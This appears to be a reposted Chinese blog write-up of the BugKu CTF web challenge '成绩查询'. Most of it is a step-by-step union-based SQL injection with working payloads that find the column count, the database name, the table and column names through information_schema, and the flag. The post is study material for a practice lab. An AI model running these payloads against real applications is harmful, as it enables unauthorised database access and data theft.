BugKu——Web——成绩查询

Posted 2021-09-17 山川绿水

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了BugKu——Web——成绩查询相关的知识，希望对你有一定的参考价值。

1.拿到题目先测试注入点，分别输入了1，2，3，4；输入到4的时候没有回显

2.当我们输入1'时会报错，而我们使用1'#时就不会报错

3.测试or,and等关键字
1' or 1=1#
1' and 1=2#
发现没有被过滤

4.判断列名
1' order by 1,2,3#

三列，四列的时候依然回显正常，而当我们输入第五列的时候报错，说明有四列1' order by 1,2,3,4,5#

5.查看显位点

-1' union select 1,2,3,4#

6.可以看到显位点是在4上，爆库开始

-1' union select 1,2,3,database()#

7.知道库名：skctf,爆表开始

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf'#

8.知道库名——skctf，表名——fl4g,接下来我们爆字段名

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'#

9.接下来爆字段内容

-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#

得到flag:

flag{d0578745a66a685ca161aad8e71f858e}

以上是关于BugKu——Web——成绩查询的主要内容，如果未能解决你的问题，请参考以下文章